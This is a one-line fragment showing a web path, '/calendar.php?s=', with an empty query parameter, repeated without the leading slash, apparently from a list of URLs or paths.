/calendar.php?s= calendar.php?s=